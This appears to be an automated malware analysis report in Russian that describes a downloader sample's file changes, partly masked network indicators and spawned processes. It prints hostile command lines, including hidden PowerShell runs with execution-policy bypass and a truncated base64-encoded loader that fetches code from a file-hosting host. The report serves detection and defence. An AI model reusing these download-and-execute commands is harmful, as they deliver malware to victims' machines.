Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\i2lpysyd.0.cs
- %TEMP%\i2lpysyd.cmdline
- %TEMP%\i2lpysyd.out
- %TEMP%\cscaa71.tmp
- %TEMP%\resaa82.tmp
- %TEMP%\i2lpysyd.dll
- %APPDATA%\seethebestthingswithhereworkingskillwhichnevergetbackbett.vbs
Удаляет следующие файлы
- %TEMP%\resaa82.tmp
- %TEMP%\cscaa71.tmp
- %TEMP%\i2lpysyd.0.cs
- %TEMP%\i2lpysyd.out
- %TEMP%\i2lpysyd.dll
- %TEMP%\i2lpysyd.cmdline
- %TEMP%\i2lpysyd.pdb
Сетевая активность
Подключается к
- '17#.#45.123.3':80
- '10##.#ilemail.com':443
TCP
Запросы HTTP GET
- http://17#.#45.123.3/66/seethebestthingswithhereworkingskillwhichnevergetbackbetter.tIF
Другие
- '10##.#ilemail.com':443
UDP
- DNS ASK 10##.#ilemail.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\seethebestthingswithhereworkingskillwhichnevergetbackbett.vbS"
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "PowERsHELL.ExE -EX bYPAsS -nop -w ... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EX bYPAsS -nop -w 1 -c dEViCEcREDenTIAlDEPlOymENT
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\i2lpysyd.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAA82.tmp" "%TEMP%\CSCAA71.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KCc0N09pbWFnZVVybCA9IDVTNGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZycrJ2V0P2ZpbGUnKydrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRd... (со скрытым окном)
